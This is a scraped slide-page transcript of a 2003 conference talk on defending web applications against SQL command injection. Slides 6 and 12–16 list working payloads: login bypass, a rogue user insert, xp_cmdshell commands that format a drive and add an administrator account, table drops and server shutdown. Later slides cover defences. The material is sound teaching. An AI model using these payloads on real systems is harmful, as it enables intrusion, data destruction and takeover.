Presentation is loading. Please wait.

Presentation is loading. Please wait.

Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003.

Published byJuniper Casey Modified over 8 years ago

Similar presentations

Presentation on theme: "Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003."— Presentation transcript:

1 Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003

2 www.owasp.org The Open Web Application Security Project (OWASP) is an Open Source community project staffed entirely by volunteers from across the world. The project is developing software tools and knowledge based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com. All software and documentation is released under the GNU public licenses. The Open Web Application Security Project (OWASP) is an Open Source community project staffed entirely by volunteers from across the world. The project is developing software tools and knowledge based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com. All software and documentation is released under the GNU public licenses.

3 The OWASP Top-10 Unvalidated Parameters Unvalidated Parameters Broken Access Control Broken Access Control Broken Account and Session Management Broken Account and Session Management Cross-Site Scripting (XSS) Flaws Cross-Site Scripting (XSS) Flaws Buffer Overflows Buffer Overflows Command Injection Flaws Command Injection Flaws Error Handling Problems Error Handling Problems Insecure Use of Cryptography Insecure Use of Cryptography Remote Administration Flaws Remote Administration Flaws Web and Application Server Misconfiguration Web and Application Server Misconfiguration

4 The front door: Any time the user can supply free- form text that will be incorporated directly into a SQL statement. Username: Password:

5 How the lock works: ASP/PHP/CGI is used to compose a SQL querry  SELECT * FROM tbl_Users WHERE UID='testuser' AND PWD='testpass'

6 How the lock fails: SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1;--'

7 Going through the broken lock…

8

9

10 Is Account_No really a number?

11 Going through the broken lock…

12 ‘; INSERT INTO tbl_Users VALUES ‘newuser’, ‘password’, ’lastname’, ‘firstname’, ‘account’;-- ‘; INSERT INTO tbl_Users VALUES ‘newuser’, ‘password’, ’lastname’, ‘firstname’, ‘account’;-- ‘; UPDATE tbl_Users SET L_Name=(SELECT TOP 1 UID FROM tbl_Users WHERE UID>’@’ ORDER BY UID) WHERE UID=‘newuser’;-- ‘; UPDATE tbl_Users SET L_Name=(SELECT TOP 1 UID FROM tbl_Users WHERE UID>’@’ ORDER BY UID) WHERE UID=‘newuser’;--

13 Fun things you can you do with a broken lock: SELECT * FROM tbl_Users WHERE UID='‘; exec master..xp_cmdshell ‘dir c:\ > c:\inetpub\wwwroot\directory.txt’;--' ANDPWD='' You should then be able to browse to the file you have just created.

14 Fun things you can you do with a broken lock: SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1; exec master..xp_sendmail @recipients=‘gspanier@psu.edu’, @subject=‘important message’, @message=‘bite me.’;--'

15 Causing damage: ‘; shutdown with nowait;-- ‘; shutdown with nowait;-- Get the name of the table by using a “having” clause (‘ having 1=1;--), then ‘; drop table tablename;-- Get the name of the table by using a “having” clause (‘ having 1=1;--), then ‘; drop table tablename;--

16 Causing damage: how about this: ‘; exec master..xp_cmdshell ‘format c: /q /yes’;-- how about this: ‘; exec master..xp_cmdshell ‘format c: /q /yes’;-- or this: ‘; exec master..xp_cmdshell ‘net user newacct password /add’; exec master..xp_cmdshell ‘net localgroup administrators newacct /add’;-- or this: ‘; exec master..xp_cmdshell ‘net user newacct password /add’; exec master..xp_cmdshell ‘net localgroup administrators newacct /add’;--

17 What can we do about it: Be aware of the contexts the program will run in. Accounts should have specific permissions; only the permissions they need. Be aware of the contexts the program will run in. Accounts should have specific permissions; only the permissions they need. Scrub all user input: only accept allowed string lengths, escape quotes, look for suspicious text (--, xp_, drop, etc…) Don’t depend on client-side checks Scrub all user input: only accept allowed string lengths, escape quotes, look for suspicious text (--, xp_, drop, etc…) Don’t depend on client-side checks

18 What can we do about it: Redirect the default error messages. Redirect the default error messages. Move ASP-built SQL queries into stored procedures. Move ASP-built SQL queries into stored procedures. Check referral URL’s. Check referral URL’s. Don’t give away information for free. Don’t give away information for free. Keep application logs. Keep application logs.

19 Thank You! Questions?

Download ppt "Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003."

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
Webgoat.

Webgoat.
OWASP’s Ten Most Critical Web Application Security Vulnerabilities

OWASP’s Ten Most Critical Web Application Security Vulnerabilities
© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me.

© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me.
Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!

Don’t get Stung (An introduction to the OWASP Top Ten Project) Barry Dorrans Microsoft Information Security Tools NEW AND IMPROVED!
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Understand Database Security Concepts

Understand Database Security Concepts
Copyright © 2004 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
Web Application Security Vulnerabilities Yen-Cheng Chen Department of Information Management National Chi Nan University Puli, 545 Nantou, Taiwan

Web Application Security Vulnerabilities Yen-Cheng Chen Department of Information Management National Chi Nan University Puli, 545 Nantou, Taiwan
-Ajay Babu.D y5cs022.. Contents Who is hacker? History of hacking Types of hacking Do You Know? What do hackers do? - Some Examples on Web application.

-Ajay Babu.D y5cs022.. Contents Who is hacker? History of hacking Types of hacking Do You Know? What do hackers do? - Some Examples on Web application.
Into the Mind of the Hacker: Hands-On Web Application Hacking Adam Doupé University of California, Santa Barbara 4/23/12.

Into the Mind of the Hacker: Hands-On Web Application Hacking Adam Doupé University of California, Santa Barbara 4/23/12.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.

Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.

Web Application Security An Introduction. OWASP Top Ten Exploits *Unvalidated Input Broken Access Control Broken Authentication and Session Management.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.

Dec 13 th CS555 presentation1 Yiwen Wang --“Securing the DB may be the single biggest action an organization can take to protect its assets” David C. Knox.
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.

Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Similar presentations

Ads by Google